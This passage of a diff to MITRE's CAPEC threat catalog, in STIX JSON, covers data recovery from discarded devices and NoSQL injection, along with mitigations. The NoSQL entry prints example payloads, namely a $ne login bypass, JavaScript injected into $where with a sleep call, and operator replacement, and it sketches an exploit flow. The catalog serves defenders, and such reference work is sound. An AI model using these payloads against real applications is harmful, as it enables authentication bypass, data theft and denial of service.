"2022-09-29T00:00:00.000Z", + "name": "coa-674-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df0ce1ec-3322-4b0a-9e1d-fa7dcddce433", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d9c23bac-b643-4817-b0e5-0b21f4c2dae6", + "spec_version": "2.1", + "target_ref": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--228b9edf-0a87-42c6-b3df-817ef320b28f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bbe1a74c-b985-4607-a7aa-6a9cbf724b87", + "spec_version": "2.1", + "target_ref": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e4f482f0-9628-4ce5-bf90-cc5a98776506", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "spec_version": "2.1", + "target_ref": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary obtains decommissioned, recycled, or discarded systems and devices that can include an organization’s intellectual property, employee data, and other types of controlled information. 
Systems and devices that have reached the end of their lifecycles may be subject to recycle or disposal where they can be exposed to adversarial attempts to retrieve information from internal memory chips and storage devices that are part of the system.\n ", + "external_references": [ + { + "external_id": "CAPEC-675", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/675.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "description": "Exfiltration Over Physical Medium", + "external_id": "T1052", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1052" + }, + { + "description": "Richard Kissel, Andrew Regenscheid, Matthew Scholl, Kevin Stine, NIST Special Publication 800-88 Revision 1: Guidelines for Media Sanitization, 2014--12, National Institute of Standards and Technology", + "external_id": "REF-663", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-88r1.pdf" + }, + { + "description": "Linda Pesante, Christopher King, George Silowash, Disposing of Devices Safely, 2012, CISA United States Computer Emergency Readiness Team (US-CERT)", + "external_id": "REF-717", + "source_name": "reference_from_CAPEC", + "url": "https://www.cisa.gov/uscert/sites/default/files/publications/DisposeDevicesSafely.pdf" + } + ], + "id": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Retrieve Data from Decommissioned Devices", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--756a1a93-3734-426c-9e91-f9339de74a7a" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--55ce63d0-6143-4b95-b70c-87c5b60aafa8" + ], + "x_capec_child_of_refs": [ + 
"attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_consequences": { + "Accountability": [ + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "\n A company is contracted by an organization to provide data destruction services for solid state and hard disk drives being discarded. Prior to destruction, an adversary within the contracted company copies data from select devices, violating the data confidentiality requirements of the submitting organization.\n " + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An adversary needs to have access to electronic data processing equipment being recycled or disposed of (e.g., laptops, servers) at a collection location and the ability to take control of it for the purpose of exploiting its content." + ], + "x_capec_skills_required": { + "High": "An adversary may need the ability to mount printed circuit boards and target individual chips for exploitation.", + "Medium": "An adversary needs the technical skills required to extract solid state drives, hard disk drives, and other storage media to host on a compatible system or harness to gain access to digital content." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Backup device data before erasure to retain intellectual property and inside knowledge.", + "id": "course-of-action--768de10a-6dae-46e1-88e8-fac5a8033e51", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--03ca0e49-f51b-444a-bfae-ac04853513a4", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--768de10a-6dae-46e1-88e8-fac5a8033e51", + "spec_version": "2.1", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Overwrite data on device rather than deleting. Deleted data can still be recovered, even if the device trash can is emptied. Rewriting data removes any trace of the old data. 
Performing multiple overwrites followed by a zeroing of the device (overwriting with all zeros) is good practice.", + "id": "course-of-action--818359f4-4568-4bf9-ad3f-7eb90981e184", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--29b103ab-eae1-46f7-8c4c-18b3567ab7d7", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--818359f4-4568-4bf9-ad3f-7eb90981e184", + "spec_version": "2.1", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a secure erase software.", + "id": "course-of-action--bf22f1fa-b5cb-4733-a825-810c681f76aa", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--006acdf6-fa11-4dbc-b447-35cfd3577991", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf22f1fa-b5cb-4733-a825-810c681f76aa", + "spec_version": "2.1", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + 
"type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Physically destroy the device if it is not intended to be reused. Using a specialized service to disintegrate, burn, melt or pulverize the device can be effective, but if those services are inaccessible, drilling nails or holes, or smashing the device with a hammer can be effective. Do not burn, microwave, or pour acid on a hard drive.", + "id": "course-of-action--4b4bbf38-311c-44cf-b12d-6b86aa64c42f", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ca3fdcd4-4c53-4c80-b0bc-99ed5fc92cf2", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4b4bbf38-311c-44cf-b12d-6b86aa64c42f", + "spec_version": "2.1", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Physically destroy memory and SIM cards for mobile devices not intended to be reused.", + "id": "course-of-action--388e0698-f2f5-4a1e-9c92-8446aeb9bf7a", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--74fd4f17-afa6-4329-9ea8-ddc1e2e6d43b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--388e0698-f2f5-4a1e-9c92-8446aeb9bf7a", + "spec_version": "2.1", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that the user account has been terminated or switched to a new device before destroying.", + "id": "course-of-action--c28595a5-c39f-414b-9c5d-1907e7202d7d", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eb3df538-c4c4-4672-aef8-3908c2fce1fc", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c28595a5-c39f-414b-9c5d-1907e7202d7d", + "spec_version": "2.1", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary targets software that constructs NoSQL statements based on user input or with parameters vulnerable to operator replacement in order to achieve a variety of technical impacts such as escalating 
privileges, bypassing authentication, and/or executing code.\n ", + "external_references": [ + { + "external_id": "CAPEC-676", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/676.html" + }, + { + "external_id": "CWE-943", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/943.html" + }, + { + "external_id": "CWE-1286", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1286.html" + }, + { + "description": "Testing for NoSQL Injection, The OWASP Foundation", + "external_id": "REF-668", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection" + }, + { + "description": "Charlie Belmer, NoSql Injection Cheatsheet, 2021--06---07, Null Sweep", + "external_id": "REF-669", + "source_name": "reference_from_CAPEC", + "url": "https://nullsweep.com/nosql-injection-cheatsheet/" + }, + { + "description": "Patrick Spiegel, NoSql Injection: Fun with Objects and Arrays, The OWASP Foundation", + "external_id": "REF-670", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf" + }, + { + "description": "NoSql Injection: Fun with Objects and ArraysNoSQL Injection Attacks and Prevention Techniques, 2019--06, WebOrion", + "external_id": "REF-671", + "source_name": "reference_from_CAPEC", + "url": "https://www.theweborion.com/wp-content/uploads/2019/06/NoSQL-Injection-Attacks-and-Prevention-Techniques.pdf" + } + ], + "id": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "NoSQL Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3" + ], + 
"x_capec_child_of_refs": [ + "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The following examples primarily cite MongoDB, PHP, and NodeJS attacks due to their prominence and popularity. However, please note that these attacks are not exclusive to this NoSQL instance, programming language, or runtime framework.\n Within NodeJS, Login Bypass attacks are possible via MongoDB if user-input is not properly validated and sanitized [REF-670].\n //NodeJS with Express.jsdb.collection('users').find({\"user\": req.query.user,\"password\": req.query.password});\n \n \n The above code works fine if the user were to submit a query like the following:\n https://example.org/login?user=patrick&password=1234\n \n But an adversary could submit a malicious query such as the below, which would be interpreted by the code as follows:\n https://example.org/login?user=patrick&password[$ne]=\n //NodeJS with Express.jsdb.collection('users').find({\"user\": bob,\"password\": {\"&ne\": \"\"}});\n \n This will result in a Login Bypass attack, as the query will succeed for all values where Bob's password is not an empty string.\n ", + "\n MongoDB instances are also vulnerable to JavaScript Injection Attacks when user input is not properly validated and sanitized.\n //PHP with MongoDBdb.collection.find({$where: function() {return (this.username == $username) } } );\n \n \n \n If the user properly specifies a username, then this code will execute as intended. 
However, an adversary can inject JavaScript into the \"$username\" variable to achieve a NoSQL Injection attack as follows:\n //PHP with MongoDBdb.collection.find({$where: function() {return (this.username == 'foo'; sleep(5000) ) } } );\n \n \n This will result in the server sleeping for 5 seconds if the attack was successful. An adversary could supply a larger value to deny service to the application.\n ", + "\n If leveraging PHP with MongoDB, operator replacement attacks are possible if special query operators are not properly addressed. The below example from OWASP's \"Test for NoSQL Injection\" displays a simple case of how this could occur.[REF-668]\n db.myCollection.find({$where: function() {return obj.credits - obj.debits < 0; } } );\n \n \n Even though the above query does not depend on any user input, it is vulnerable to a NoSQL injection attack via operator replacement on the \"$where\" keyword. In this case, the adversary could exploit MongoDB in the following manner:\n $where: function() { //arbitrary JavaScript here }\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey target application: Due to the number of NoSQL databases available and the numerous language/API combinations of each, the adversary must first survey the target application to learn what technologies are being leveraged and how they interact with user-driven data.

  2. Techniques
    Determine the technology stack leveraged by the target application, such as the application server, drivers, frameworks, APIs, and databases being utilized.
    Identify areas of the application that interact with user input and may be involved with NoSQL queries.

Experiment

  1. Identify user-controllable input susceptible to injection: After identifying the technology stack being used and where user-driven input is leveraged, determine the user-controllable input susceptible to injection such as authentication or search forms. For each user-controllable input that the adversary suspects is vulnerable to NoSQL injection, attempt to inject characters or keywords that have special meaning in the given NoSQL database or language (e.g., \"$ne\" for MongoDB or \"$exists\" for PHP/MongoDB), or JavaScript that can be executed within the application. The goal is to create a NoSQL query with an invalid syntax.

  2. Techniques
    Use web browser to inject input through text fields or through HTTP GET parameters.
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
    Use network-level packet injection tools such as netcat to inject input
    Use modified client (modified by reverse engineering) to inject input.
  3. Experiment with NoSQL Injection vulnerabilities: After determining that a given input is vulnerable to NoSQL Injection, hypothesize what the underlying query looks like. Iteratively try to add logic to the query to extract information from the database, modify/delete information in the database, or execute commands on the server.

  4. Techniques
    Use public resources such as OWASP's \"Testing for NoSQL Injection\" [REF-668] or Null Sweep's \"NoSQL Injection Cheatsheet\" [REF-669] and try different approaches for adding logic to NoSQL queries.
    Iteratively add logic to the NoSQL query and use detailed error messages from the server to debug the query.
    Attempt an HTTP Parameter Pollution attack to replace language-specific keywords, such as \"where\" within PHP [CAPEC-460].

Exploit

  1. Exploit NoSQL Injection vulnerability: After refining and adding various logic to NoSQL queries, craft and execute the underlying NoSQL query that will be used to attack the target system.

  2. Techniques
    Craft and Execute underlying NoSQL query
", + "x_capec_extended_description": "\n NoSQL database calls are written in an application's programming language, via a custom API call, or formatted in a common convention (e.g., JSON, XML, etc.), any of which the adversary can exploit to achieve the aforementioned goals. NoSQL attacks usually result from improper sanitization and validation of data that originates from a user, either via special character or JavaScript injection. In both cases, the adversary crafts input strings so that when the target software constructs NoSQL statements based on the input, the resulting NoSQL statement performs actions other than those intended by the application. However, unlike traditional SQL Injection attacks, NoSQL injection attacks can also occur in instances where the application does not rely upon user input, as is the case in operator replacements. This entails the adversary overriding reserved NoSQL variable names with ones that have been modified with malicious functionality (e.g., $where in MongoDB). In all cases, depending on the NoSQL API and data model used, successful injection can cause information disclosure, data modification, and code execution at the application level.\n Note: NoSQL Injection attacks are executed within a procedural language (e.g., C, C++, Perl), as opposed to the declarative SQL language itself. As a result, NoSQL injection attacks can potentially result in greater impacts than traditional SQL Injection attacks [REF-668].\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Awareness of the technology stack being leveraged by the target application.", + "NoSQL queries used by the application to store, retrieve, or modify data.", + "User-controllable input that is not properly validated by the application as part of NoSQL queries.", + "Target potentially susceptible to operator replacement attacks." 
+ ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "For keyword and JavaScript injection attacks, it is fairly simple for someone with basic NoSQL knowledge to perform NoSQL injection, once the target's technology stack has been determined.", + "Medium": "For operator replacement attacks, the adversary must also have knowledge of HTTP Parameter Pollution attacks and how to conduct them." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as relevant NoSQL and JavaScript content. NoSQL-specific keywords, such as $ne, $eq or $gt for MongoDB, must be filtered in addition to characters such as a single-quote(') or semicolons (;) based on the context in which they appear. 
Validation should also extend to expected types.", + "id": "course-of-action--c3e9e3ff-9ab8-46b9-8bd2-7d63b43a2ef4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--869ea0bd-ba58-497e-ba60-bb6b4e05a203", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c3e9e3ff-9ab8-46b9-8bd2-7d63b43a2ef4", + "spec_version": "2.1", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If possible, leverage safe APIs (e.g., PyMongo and Flask-PyMongo for Python and MongoDB) for queries as opposed to building queries from strings.", + "id": "course-of-action--c36658ef-ec56-451f-9d0f-cc4e8364709e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d13883d0-b82e-40df-b760-850af2e151e9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c36658ef-ec56-451f-9d0f-cc4e8364709e", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure the most recent version of a NoSQL database and it's corresponding API are used by the application.", + "id": "course-of-action--f535cf43-16c4-4702-82b4-f2ad54457382", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ba86a192-07aa-4b27-be1a-28cd2e920662", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f535cf43-16c4-4702-82b4-f2ad54457382", + "spec_version": "2.1", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of custom error pages - Adversaries can glean information about the nature of queries from descriptive error messages. 
Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application.", + "id": "course-of-action--4c849df7-9814-41f1-b257-5be9d1636087", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1126520b-05be-455e-9d4d-a4bcf7ce2218", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4c849df7-9814-41f1-b257-5be9d1636087", + "spec_version": "2.1", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Exercise the principle of Least Privilege with regards to application accounts to minimize damage if a NoSQL injection attack is successful.", + "id": "course-of-action--7f433708-ce26-4500-81a0-5a94a7fe8032", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ec6f7349-8700-4bcc-a21a-24391221b7c8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--7f433708-ce26-4500-81a0-5a94a7fe8032", + "spec_version": "2.1", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If using MongoDB, disable server-side JavaScript execution and leverage a sanitization module such as \"mongo-sanitize\".", + "id": "course-of-action--3aa6e395-8929-42e8-96db-20d559ee7c77", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5101e2fb-b215-4be6-857a-0e5c8aa7341c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3aa6e395-8929-42e8-96db-20d559ee7c77", + "spec_version": "2.1", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If using PHP with MongoDB, ensure all special query operators (starting with $) use single quotes to prevent operator replacement attacks.", + "id": "course-of-action--3753e389-6551-4beb-a945-aa3c36831232", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ce0040af-39bd-44c9-b2a6-d529ca6a642d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3753e389-6551-4beb-a945-aa3c36831232", + "spec_version": "2.1", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Additional mitigations will depend on the NoSQL database, API, and programming language leveraged by the application.", + "id": "course-of-action--514cd9bd-12f1-4cf8-9093-4f575517aa3b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3626f089-3a82-4044-85fc-50f2f7def667", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 